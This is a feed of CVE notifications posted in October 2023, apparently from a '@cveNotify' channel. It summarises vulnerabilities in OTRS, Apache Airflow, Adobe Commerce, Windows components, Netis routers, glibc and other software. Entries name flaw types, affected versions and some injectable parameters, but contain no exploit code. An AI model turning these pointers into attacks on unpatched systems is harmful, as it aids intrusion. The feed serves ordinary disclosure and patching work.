🚨 CVE-2023-5421An attacker who is logged into OTRS as an user with privileges to create and change customer user data may manipulate the CustomerID field to execute JavaScript code that runs immediatly after the data is saved.The issue onlyoccurs if the configuration for AdminCustomerUser::UseAutoComplete was changed before.This issue affects OTRS: from 7.0.X before 7.0.47, from 8.0.X before 8.0.37; ((OTRS)) Community Edition: from 6.0.X through 6.0.34.🎖@cveNotify |
|
| 2023-10-16 10:22:03 |
🚨 CVE-2023-5422The functions to fetch e-mail via POP3 or IMAP as well as sending e-mail via SMTP use OpenSSL for static SSL or TLS based communication. As the SSL_get_verify_result() function is not used the certificated is trusted always and it can not be ensured that the certificate satisfies all necessary security requirements.This could allow an attacker to use an invalid certificate to claim to be a trusted host, use expired certificates, or conduct other attacks that could be detected if the certificate is properly validated.This issue affects OTRS: from 7.0.X before 7.0.47, from 8.0.X before 8.0.37; ((OTRS)) Community Edition: from 6.0.X through 6.0.34.🎖@cveNotify |
|
| 2023-10-16 10:22:02 |
🚨 CVE-2023-5595Denial of Service in GitHub repository gpac/gpac prior to 2.3.0-DEV.🎖@cveNotify |
|
| 2023-10-16 10:22:01 |
🚨 CVE-2023-1400The Modern Events Calendar Lite WordPress plugin before 6.5.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2023-10-16 10:22:00 |
🚨 CVE-2023-45158An OS command injection vulnerability exists in web2py 2.24.1 and earlier. When the product is configured to use notifySendHandler for logging (not the default configuration), a crafted web request may execute an arbitrary OS command on the web server using the product.🎖@cveNotify |
|
| 2023-10-16 10:21:58 |
🚨 CVE-2023-21414NCC Group has found a flaw during the annual internal penetration test ordered by Axis Communications. The protection for device tampering (commonly known as Secure Boot) contains a flaw which provides an opportunity for a sophisticated attack to bypass this protection. Axis has released patched AXIS OS versions for the highlighted flaw. Please refer to the Axis security advisory for more information and solution.🎖@cveNotify |
|
| 2023-10-16 10:21:57 |
🚨 CVE-2023-21415Sandro Poppi, member of the AXIS OS Bug Bounty Program, has found that the VAPIX API overlay_del.cgi is vulnerable to path traversal attacks that allows for file deletion. This flaw can only be exploited after authenticating with an operator- or administrator-privileged service account. Axis has released patched AXIS OS versions for the highlighted flaw. Please refer to the Axis security advisory for more information and solution.🎖@cveNotify |
|
| 2023-10-16 01:22:08 |
🚨 CVE-2023-5589A vulnerability was found in SourceCodester Judging Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file login.php. The manipulation of the argument password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-242188.🎖@cveNotify |
|
| 2023-10-16 01:22:06 |
🚨 CVE-2023-5590NULL Pointer Dereference in GitHub repository seleniumhq/selenium prior to 4.14.0.🎖@cveNotify |
|
| 2023-10-16 01:22:04 |
🚨 CVE-2023-5587A vulnerability was found in SourceCodester Free Hospital Management System for Small Practices 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /vm/admin/doctors.php of the component Parameter Handler. The manipulation of the argument search leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-242186 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-16 01:22:02 |
🚨 CVE-2023-5588A vulnerability was found in kphrx pleroma. It has been classified as problematic. This affects the function Pleroma.Emoji.Pack of the file lib/pleroma/emoji/pack.ex. The manipulation of the argument name leads to path traversal. The complexity of an attack is rather high. The exploitability is told to be difficult. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The patch is named 2c795094535537a8607cc0d3b7f076a609636f40. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-242187.🎖@cveNotify |
|
| 2023-10-14 22:51:56 |
🚨 CVE-2023-45863An issue was discovered in lib/kobject.c in the Linux kernel before 6.2.3. With root access, an attacker can trigger a race condition that results in a fill_kobj_path out-of-bounds write.🎖@cveNotify |
|
| 2023-10-14 20:21:57 |
🚨 CVE-2023-4911A buffer overflow was discovered in the GNU C Library's dynamic loader ld.so while processing the GLIBC_TUNABLES environment variable. This issue could allow a local attacker to use maliciously crafted GLIBC_TUNABLES environment variables when launching binaries with SUID permission to execute code with elevated privileges.🎖@cveNotify |
|
| 2023-10-14 19:22:06 |
🚨 CVE-2022-43740IBM Security Verify Access OIDC Provider could allow a remote user to cause a denial of service due to uncontrolled resource consumption. IBM X-Force ID: 238921.🎖@cveNotify |
|
| 2023-10-14 19:22:04 |
🚨 CVE-2022-43868IBM Security Verify Access OIDC Provider could disclose directory information that could aid attackers in further attacks against the system. IBM X-Force ID: 239445.🎖@cveNotify |
|
| 2023-10-14 19:22:03 |
🚨 CVE-2023-35024IBM Cloud Pak for Business Automation 18.0.0, 18.0.1, 18.0.2, 19.0.1, 19.0.2, 19.0.3, 20.0.1, 20.0.2, 20.0.3, 21.0.1, 21.0.2, 21.0.3, 22.0.1, and 22.0.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 258349.🎖@cveNotify |
|
| 2023-10-14 19:22:01 |
🚨 CVE-2023-45176IBM App Connect Enterprise 11.0.0.1 through 11.0.0.23, 12.0.1.0 through 12.0.10.0 and IBM Integration Bus 10.1 through 10.1.0.1 are vulnerable to a denial of service for integration nodes on Windows. IBM X-Force ID: 247998.🎖@cveNotify |
|
| 2023-10-14 19:22:00 |
🚨 CVE-2023-30994IBM QRadar SIEM 7.5.0 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 254138🎖@cveNotify |
|
| 2023-10-14 19:21:58 |
🚨 CVE-2023-40367IBM QRadar SIEM 7.5.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 263376.🎖@cveNotify |
|
| 2023-10-14 19:21:57 |
🚨 CVE-2023-5582A vulnerability, which was classified as problematic, has been found in ZZZCMS 2.2.0. This issue affects some unknown processing of the component Personal Profile Page. The manipulation leads to basic cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-242147.🎖@cveNotify |
|
| 2023-10-14 16:52:38 |
🚨 CVE-2022-32755IBM Security Directory Server 6.4.0 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 228505.🎖@cveNotify |
|
| 2023-10-14 16:52:37 |
🚨 CVE-2022-33161IBM Security Directory Server 6.4.0 could allow a remote attacker to obtain sensitive information, caused by the failure to properly enable HTTP Strict Transport Security. An attacker could exploit this vulnerability to obtain sensitive information using man in the middle techniques. X-Force ID: 228569.🎖@cveNotify |
|
| 2023-10-14 16:52:36 |
🚨 CVE-2022-33165IBM Security Directory Server 6.4.0 could allow a remote attacker to traverse directories on the system. An attacker could send a specially-crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 228582.🎖@cveNotify |
|
| 2023-10-14 16:52:35 |
🚨 CVE-2023-5582A vulnerability, which was classified as problematic, has been found in ZZZCMS 2.2.0. This issue affects some unknown processing of the component Personal Profile Page. The manipulation leads to basic cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-242147.🎖@cveNotify |
|
| 2023-10-14 12:22:40 |
🚨 CVE-2023-42663Apache Airflow, versions before 2.7.2, has a vulnerability that allows an authorized user who has access to read specific DAGs only, to read information about task instances in other DAGs.Users of Apache Airflow are advised to upgrade to version 2.7.2 or newer to mitigate the risk associated with this vulnerability.🎖@cveNotify |
|
| 2023-10-14 12:22:39 |
🚨 CVE-2023-42780Apache Airflow, versions prior to 2.7.2, contains a security vulnerability that allows authenticated users of Airflow to list warnings for all DAGs, even if the user had no permission to see those DAGs. It would reveal the dag_ids and the stack-traces of import errors for those DAGs with import errors.Users of Apache Airflow are advised to upgrade to version 2.7.2 or newer to mitigate the risk associated with this vulnerability.🎖@cveNotify |
|
| 2023-10-14 12:22:38 |
🚨 CVE-2023-42792Apache Airflow, in versions prior to 2.7.2, contains a security vulnerability that allows an authenticated user with limited access to some DAGs, to craft a request that could give the user write access to various DAG resources for DAGs that the user had no access to, thus, enabling the user to clear DAGs they shouldn't.Users of Apache Airflow are strongly advised to upgrade to version 2.7.2 or newer to mitigate the risk associated with this vulnerability.🎖@cveNotify |
|
| 2023-10-14 12:22:37 |
🚨 CVE-2023-45348Apache Airflow, versions 2.7.0 and 2.7.1, is affected by a vulnerability that allows an authenticated user to retrieve sensitive configuration information when the "expose_config" option is set to "non-sensitive-only". The `expose_config` option is False by default.It is recommended to upgrade to a version that is not affected.🎖@cveNotify |
|
| 2023-10-14 11:22:44 |
🚨 CVE-2023-26155All versions of the package node-qpdf are vulnerable to Command Injection such that the package-exported method encrypt() fails to sanitize its parameter input, which later flows into a sensitive command execution API. As a result, attackers may inject malicious commands once they can specify the input pdf file path.🎖@cveNotify |
|
| 2023-10-14 11:22:43 |
🚨 CVE-2023-44037An issue in ZPE Systems, Inc Nodegrid OS v.5.8.10 thru v.5.8.13 and v.5.10.3 thru v.5.10.5 allows a remote attacker to obtain sensitive information via the TACACS+ server component.🎖@cveNotify |
|
| 2023-10-14 11:22:42 |
🚨 CVE-2023-45855qdPM 9.2 allows Directory Traversal to list files and directories by navigating to the /uploads URI.🎖@cveNotify |
|
| 2023-10-14 11:22:41 |
🚨 CVE-2023-45856qdPM 9.2 allows remote code execution by using the Add Attachments feature of Edit Project to upload a .php file to the /uploads URI.🎖@cveNotify |
|
| 2023-10-14 01:22:07 |
🚨 CVE-2023-4257Unchecked user input length in /subsys/net/l2/wifi/wifi_shell.c can cause buffer overflows.🎖@cveNotify |
|
| 2023-10-14 01:22:06 |
🚨 CVE-2023-4911A buffer overflow was discovered in the GNU C Library's dynamic loader ld.so while processing the GLIBC_TUNABLES environment variable. This issue could allow a local attacker to use maliciously crafted GLIBC_TUNABLES environment variables when launching binaries with SUID permission to execute code with elevated privileges.🎖@cveNotify |
|
| 2023-10-14 01:22:05 |
🚨 CVE-2023-3341The code that processes control channel messages sent to `named` calls certain functions recursively during packet parsing. Recursion depth is only limited by the maximum accepted packet size; depending on the environment, this may cause the packet-parsing code to run out of available stack memory, causing `named` to terminate unexpectedly. Since each incoming control channel message is fully parsed before its contents are authenticated, exploiting this flaw does not require the attacker to hold a valid RNDC key; only network access to the control channel's configured TCP port is necessary.This issue affects BIND 9 versions 9.2.0 through 9.16.43, 9.18.0 through 9.18.18, 9.19.0 through 9.19.16, 9.9.3-S1 through 9.16.43-S1, and 9.18.0-S1 through 9.18.18-S1.🎖@cveNotify |
|
| 2023-10-14 01:22:03 |
🚨 CVE-2023-4236A flaw in the networking code handling DNS-over-TLS queries may cause `named` to terminate unexpectedly due to an assertion failure. This happens when internal data structures are incorrectly reused under significant DNS-over-TLS query load.This issue affects BIND 9 versions 9.18.0 through 9.18.18 and 9.18.11-S1 through 9.18.18-S1.🎖@cveNotify |
|
| 2023-10-14 01:22:02 |
🚨 CVE-2023-38039When curl retrieves an HTTP response, it stores the incoming headers so thatthey can be accessed later via the libcurl headers API.However, curl did not have a limit in how many or how large headers it wouldaccept in a response, allowing a malicious server to stream an endless seriesof headers and eventually cause curl to run out of heap memory.🎖@cveNotify |
|
| 2023-10-14 01:22:01 |
🚨 CVE-2023-4802A reflected cross-site scripting vulnerability in the UpdateInstalledSoftware endpoint of the Insider Threat Management (ITM) Server's web console could be used by an authenticated administrator to run arbitrary javascript within another web console administrator's browser. All versions prior to 7.14.3.69 are affected.🎖@cveNotify |
|
| 2023-10-14 01:22:00 |
🚨 CVE-2023-4803A reflected cross-site scripting vulnerability in the WriteWindowTitle endpoint of the Insider Threat Management (ITM) Server's web console could be used by an authenticated administrator to run arbitrary javascript within another web console administrator's browser. All versions prior to 7.14.3.69 are affected.🎖@cveNotify |
|
| 2023-10-14 01:21:59 |
🚨 CVE-2023-4828An improper check for an exceptional condition in the Insider Threat Management (ITM) Server could be used by an attacker to change the server's configuration of any already-registered agent so that the agent sends all future communications to an attacker-chosen URL. This could result in disclosure of sensitive data events from the agent about the personally identifiable information (PII) and intellectual property it monitors, and all such data could be altered or deleted before reaching the ITM Server. An attacker must first successfully obtain valid agent credentials and agent hostname. All versions prior to 7.14.3.69 are affected.🎖@cveNotify |
|
| 2023-10-14 01:21:58 |
🚨 CVE-2023-20900A malicious actor that has been granted Guest Operation Privileges https://docs.vmware.com/en/VMware-vSphere/8.0/vsphere-security/GUID-6A952214-0E5E-4CCF-9D2A-90948FF643EC.html in a target virtual machine may be able to elevate their privileges if that target virtual machine has been assigned a more privileged Guest Alias https://vdc-download.vmware.com/vmwb-repository/dcr-public/d1902b0e-d479-46bf-8ac9-cee0e31e8ec0/07ce8dbd-db48-4261-9b8f-c6d3ad8ba472/vim.vm.guest.AliasManager.html .🎖@cveNotify |
|
| 2023-10-13 22:52:20 |
🚨 CVE-2023-4499A potential security vulnerability has been identified in the HP ThinUpdate utility (also known as HP Recovery Image and Software Download Tool) which may lead to information disclosure. HP is releasing mitigation for the potential vulnerability.🎖@cveNotify |
|
| 2023-10-13 22:52:19 |
🚨 CVE-2023-5409HP is aware of a potential security vulnerability in HP t430 and t638 Thin Client PCs. These models may be susceptible to a physical attack, allowing an untrusted source to tamper with the system firmware using a publicly disclosed private key. HP is providing recommended guidance for customers to reduce exposure to the potential vulnerability.🎖@cveNotify |
|
| 2023-10-13 22:52:17 |
🚨 CVE-2023-5449A potential security vulnerability has been identified in certain HP Displays supporting the Theft Deterrence feature which may allow a monitor’s Theft Deterrence to be deactivated.🎖@cveNotify |
|
| 2023-10-13 22:52:16 |
🚨 CVE-2023-35645In tbd of tbd, there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-10-13 22:52:15 |
🚨 CVE-2023-43960An issue in DLINK DPH-400SE FRU 2.2.15.8 allows a remote attacker to escalate privileges via the User Modify function in the Maintenance/Access function component.🎖@cveNotify |
|
| 2023-10-13 22:52:14 |
🚨 CVE-2023-23930vantage6 is privacy preserving federated learning infrastructure. Versions prior to 4.0.0 use pickle, which has known security issue, as a default serialization module but that has known security issues. All users of vantage6 that post tasks with the default serialization are affected. Version 4.0.0 contains a patch. Users may specify JSON serialization as a workaround.🎖@cveNotify |
|
| 2023-10-13 22:52:13 |
🚨 CVE-2023-36417Microsoft SQL OLE DB Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-10-13 22:52:11 |
🚨 CVE-2023-44487The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.🎖@cveNotify |
|
| 2023-10-13 22:52:10 |
🚨 CVE-2021-46784In Squid 3.x through 3.5.28, 4.x through 4.17, and 5.x before 5.6, due to improper buffer management, a Denial of Service can occur when processing long Gopher server responses.🎖@cveNotify |
|
| 2023-10-13 22:52:09 |
🚨 CVE-2023-5490A vulnerability classified as critical was found in Beijing Baichuo Smart S45F Multi-Service Secure Gateway Intelligent Management Platform up to 20230928. This vulnerability affects unknown code of the file /useratte/userattestation.php. The manipulation of the argument web_img leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-241642 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-10-13 22:52:08 |
🚨 CVE-2023-5489A vulnerability classified as critical has been found in Beijing Baichuo Smart S45F Multi-Service Secure Gateway Intelligent Management Platform up to 20230928. This affects an unknown part of the file /Tool/uploadfile.php. The manipulation of the argument file_upload leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-241641 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-10-13 22:52:07 |
🚨 CVE-2023-36709Microsoft AllJoyn API Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-10-13 22:52:05 |
🚨 CVE-2023-36707Windows Deployment Services Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-10-13 22:52:04 |
🚨 CVE-2023-44114Out-of-bounds array vulnerability in the dataipa module.Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2023-10-13 22:52:03 |
🚨 CVE-2023-36710Windows Media Foundation Core Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-10-13 22:52:02 |
🚨 CVE-2023-36712Windows Kernel Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-10-13 22:52:01 |
🚨 CVE-2023-36711Windows Runtime C++ Template Library Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-10-13 20:52:48 |
🚨 CVE-2023-36729Named Pipe File System Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-10-13 20:52:46 |
🚨 CVE-2023-36602Windows TCP/IP Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-10-13 20:52:45 |
🚨 CVE-2023-44487The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.🎖@cveNotify |
|
| 2023-10-13 20:52:43 |
🚨 CVE-2023-36594Windows Graphics Component Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-10-13 20:52:41 |
🚨 CVE-2023-36603Windows TCP/IP Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-10-13 20:52:40 |
🚨 CVE-2023-36732Win32k Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-10-13 20:52:38 |
🚨 CVE-2023-36605Windows Named Pipe Filesystem Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-10-13 20:52:36 |
🚨 CVE-2023-36596Remote Procedure Call Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-10-13 20:52:35 |
🚨 CVE-2023-36589Microsoft Message Queuing Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-10-13 20:52:33 |
🚨 CVE-2023-36582Microsoft Message Queuing Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-10-13 20:52:31 |
🚨 CVE-2023-36581Microsoft Message Queuing Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-10-13 20:52:30 |
🚨 CVE-2023-36585Active Template Library Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-10-13 20:52:29 |
🚨 CVE-2023-35652In ProtocolEmergencyCallListIndAdapter::Init of protocolcalladapter.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with baseband firmware compromise required. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-10-13 20:52:27 |
🚨 CVE-2023-36584Windows Mark of the Web Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2023-10-13 20:52:26 |
🚨 CVE-2023-36592Microsoft Message Queuing Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-10-13 20:52:24 |
🚨 CVE-2023-39854The web interface of ATX Ucrypt through 3.5 allows authenticated users (or attackers using default credentials for the admin, master, or user account) to include files via a URL in the /hydra/view/get_cc_url url parameter. There can be resultant SSRF.🎖@cveNotify |
|
| 2023-10-13 20:52:23 |
🚨 CVE-2023-36591Microsoft Message Queuing Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-10-13 20:52:21 |
🚨 CVE-2023-36563Microsoft WordPad Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-10-13 20:52:20 |
🚨 CVE-2023-36557PrintHTML API Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-10-13 20:52:18 |
🚨 CVE-2023-36561Azure DevOps Server Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-10-13 15:22:22 |
🚨 CVE-2023-45130Frontier is Substrate's Ethereum compatibility layer. Prior to commit aea528198b3b226e0d20cce878551fd4c0e3d5d0, at the end of a contract execution, when opcode SUICIDE marks a contract to be deleted, the software uses `storage::remove_prefix` (now renamed to `storage::clear_prefix`) to remove all storages associated with it. This is a single IO primitive call passing the WebAssembly boundary. For large contracts, the call (without providing a `limit` parameter) can be slow. In addition, for parachains, all storages to be deleted will be part of the PoV, which easily exceed relay chain PoV size limit. On the other hand, Frontier's maintainers only charge a fixed cost for opcode SUICIDE. The maintainers consider the severity of this issue high, because an attacker can craft a contract with a lot of storage values on a parachain, and then call opcode SUICIDE on the contract. If the transaction makes into a parachain block, the parachain will then stall because the PoV size will exceed relay chain's limit. This is especially an issue for XCM transactions, because they can't be skipped. Commit aea528198b3b226e0d20cce878551fd4c0e3d5d0 contains a patch for this issue. For parachains, it's recommended to issue an emergency runtime upgrade as soon as possible. For standalone chains, the impact is less severe because the issue mainly affects PoV sizes. It's recommended to issue a normal runtime upgrade as soon as possible. There are no known workarounds.🎖@cveNotify |
|
| 2023-10-13 15:22:20 |
🚨 CVE-2023-45162Affected 1E Platform versions have a Blind SQL Injection vulnerability that can lead to arbitrary code execution. Application of the relevant hotfix remediates this issue.for v8.1.2 apply hotfix Q23166for v8.4.1 apply hotfix Q23164for v9.0.1 apply hotfix Q23173SaaS implementations on v23.7.1 will automatically have hotfix Q23173 applied. Customers with SaaS versions below this are urged to upgrade urgently - please contact 1E to arrange this🎖@cveNotify |
|
| 2023-10-13 15:22:19 |
🚨 CVE-2023-45463Netis N3Mv2-V1.0.1.865 was discovered to contain a buffer overflow via the hostName parameter in the FUN_0040dabc function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.🎖@cveNotify |
|
| 2023-10-13 15:22:17 |
🚨 CVE-2023-45464Netis N3Mv2-V1.0.1.865 was discovered to contain a buffer overflow via the servDomain parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.🎖@cveNotify |
|
| 2023-10-13 15:22:15 |
🚨 CVE-2023-45465Netis N3Mv2-V1.0.1.865 was discovered to contain a command injection vulnerability via the ddnsDomainName parameter in the Dynamic DNS settings.🎖@cveNotify |
|
| 2023-10-13 15:22:13 |
🚨 CVE-2023-45466Netis N3Mv2-V1.0.1.865 was discovered to contain a command injection vulnerability via the pin_host parameter in the WPS Settings.🎖@cveNotify |
|
| 2023-10-13 15:22:12 |
🚨 CVE-2023-45467Netis N3Mv2-V1.0.1.865 was discovered to contain a command injection vulnerability via the ntpServIP parameter in the Time Settings.🎖@cveNotify |
|
| 2023-10-13 15:22:11 |
🚨 CVE-2023-45468Netis N3Mv2-V1.0.1.865 was discovered to contain a buffer overflow via the pingWdogIp. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.🎖@cveNotify |
|
| 2023-10-13 15:22:09 |
🚨 CVE-2023-4517Cross-site Scripting (XSS) - Stored in GitHub repository hestiacp/hestiacp prior to 1.8.6.🎖@cveNotify |
|
| 2023-10-13 15:22:08 |
🚨 CVE-2023-4829Cross-site Scripting (XSS) - Stored in GitHub repository froxlor/froxlor prior to 2.0.22.🎖@cveNotify |
|
| 2023-10-13 15:22:07 |
🚨 CVE-2023-4995The Embed Calendly plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'calendly' shortcode in versions up to, and including, 3.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-10-13 15:22:05 |
🚨 CVE-2023-5240Improper access control in PAM propagation scripts in Devolutions Server 2023.2.8.0 and ealier allows an attack with permission to manage PAM propagation scripts to retrieve passwords stored in it via a GET request.🎖@cveNotify |
|
| 2023-10-13 15:22:04 |
🚨 CVE-2023-43786A vulnerability was found in libX11 due to an infinite loop within the PutSubImage() function. This flaw allows a local user to consume all available system resources and cause a denial of service condition.🎖@cveNotify |
|
| 2023-10-13 15:22:03 |
🚨 CVE-2023-5488A vulnerability was found in Beijing Baichuo Smart S45F Multi-Service Secure Gateway Intelligent Management Platform up to 20230928. It has been rated as critical. Affected by this issue is some unknown functionality of the file /sysmanage/updatelib.php. The manipulation of the argument file_upload leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-241640. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-10-13 15:22:02 |
🚨 CVE-2023-43787A vulnerability was found in libX11 due to an integer overflow within the XCreateImage() function. This flaw allows a local user to trigger an integer overflow and execute arbitrary code with elevated privileges.🎖@cveNotify |
|
| 2023-10-13 15:22:00 |
🚨 CVE-2023-5498Cross-Site Request Forgery (CSRF) in GitHub repository chiefonboarding/chiefonboarding prior to v2.0.47.🎖@cveNotify |
|
| 2023-10-13 15:21:59 |
🚨 CVE-2023-43079Dell OpenManage Server Administrator, versions 11.0.0.0 and prior, contains an Improper Access Control vulnerability. A local low-privileged malicious user could potentially exploit this vulnerability to execute arbitrary code in order to elevate privileges on the system. Exploitation may lead to a complete system compromise.🎖@cveNotify |
|
| 2023-10-13 15:21:58 |
🚨 CVE-2023-39999Exposure of Sensitive Information to an Unauthorized Actor in WordPress from 6.3 through 6.3.1, from 6.2 through 6.2.2, from 6.1 through 6.13, from 6.0 through 6.0.5, from 5.9 through 5.9.7, from 5.8 through 5.8.7, from 5.7 through 5.7.9, from 5.6 through 5.6.11, from 5.5 through 5.5.12, from 5.4 through 5.4.13, from 5.3 through 5.3.15, from 5.2 through 5.2.18, from 5.1 through 5.1.16, from 5.0 through 5.0.19, from 4.9 through 4.9.23, from 4.8 through 4.8.22, from 4.7 through 4.7.26, from 4.6 through 4.6.26, from 4.5 through 4.5.29, from 4.4 through 4.4.30, from 4.3 through 4.3.31, from 4.2 through 4.2.35, from 4.1 through 4.1.38.🎖@cveNotify |
|
| 2023-10-13 12:52:02 |
🚨 CVE-2023-5571Improper Input Validation in GitHub repository vriteio/vrite prior to 0.3.0.🎖@cveNotify |
|
| 2023-10-13 12:52:00 |
🚨 CVE-2023-5572Server-Side Request Forgery (SSRF) in GitHub repository vriteio/vrite prior to 0.3.0.🎖@cveNotify |
|
| 2023-10-13 12:51:59 |
🚨 CVE-2023-5573Allocation of Resources Without Limits or Throttling in GitHub repository vriteio/vrite prior to 0.3.0.🎖@cveNotify |
|
| 2023-10-13 12:51:58 |
🚨 CVE-2023-3589A Cross-Site Request Forgery (CSRF) vulnerability affecting Teamwork Cloud from No Magic Release 2021x through No Magic Release 2022x could allow with some very specific conditions an attacker to send a specifically crafted query to the server.🎖@cveNotify |
|
| 2023-10-13 10:52:12 |
🚨 CVE-2023-26366Adobe Commerce versions 2.4.7-beta1 (and earlier), 2.4.6-p2 (and earlier), 2.4.5-p4 (and earlier) and 2.4.4-p5 (and earlier) are affected by a Server-Side Request Forgery (SSRF) vulnerability that could lead to arbitrary file system read. A high-privileged authenticated attacker can force the application to make arbitrary requests via injection of arbitrary URLs. Exploitation of this issue does not require user interaction, scope is changed due to the fact that an attacker can enforce file read outside the application's path boundary.🎖@cveNotify |
|
| 2023-10-13 10:52:11 |
🚨 CVE-2023-26367Adobe Commerce versions 2.4.7-beta1 (and earlier), 2.4.6-p2 (and earlier), 2.4.5-p4 (and earlier) and 2.4.4-p5 (and earlier) are affected by an Improper Input Validation vulnerability that could lead to arbitrary file system read by an admin-privilege authenticated attacker. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2023-10-13 10:52:09 |
🚨 CVE-2023-38218Adobe Commerce versions 2.4.7-beta1 (and earlier), 2.4.6-p2 (and earlier), 2.4.5-p4 (and earlier) and 2.4.4-p5 (and earlier) are affected by an improper input validation vulnerability. An authenticated attacker can trigger an insecure direct object reference in the `V1/customers/me` endpoint to achieve information exposure and privilege escalation.🎖@cveNotify |
|
| 2023-10-13 10:52:08 |
🚨 CVE-2023-38219Adobe Commerce versions 2.4.7-beta1 (and earlier), 2.4.6-p2 (and earlier), 2.4.5-p4 (and earlier) and 2.4.4-p5 (and earlier) are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. Payload is stored in an admin area, resulting in high confidentiality and integrity impact.🎖@cveNotify |
|
| 2023-10-13 10:52:06 |
🚨 CVE-2023-38220Adobe Commerce versions 2.4.7-beta1 (and earlier), 2.4.6-p2 (and earlier), 2.4.5-p4 (and earlier) and 2.4.4-p5 (and earlier) are affected by an Improper Authorization vulnerability that could lead in a security feature bypass in a way that an attacker could access unauthorised data. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2023-10-13 10:52:05 |
🚨 CVE-2023-38221Adobe Commerce versions 2.4.7-beta1 (and earlier), 2.4.6-p2 (and earlier), 2.4.5-p4 (and earlier) and 2.4.4-p5 (and earlier) are affected by an Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability that could lead in arbitrary code execution by an admin-privilege authenticated attacker. Exploitation of this issue does not require user interaction and attack complexity is high as it requires knowledge of tooling beyond just using the UI.🎖@cveNotify |
|
| 2023-10-13 10:52:03 |
🚨 CVE-2023-38249Adobe Commerce versions 2.4.7-beta1 (and earlier), 2.4.6-p2 (and earlier), 2.4.5-p4 (and earlier) and 2.4.4-p5 (and earlier) are affected by an Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability that could lead in arbitrary code execution by an admin-privilege authenticated attacker. Exploitation of this issue does not require user interaction and attack complexity is high as it requires knowledge of tooling beyond just using the UI.🎖@cveNotify |
|
| 2023-10-13 10:52:02 |
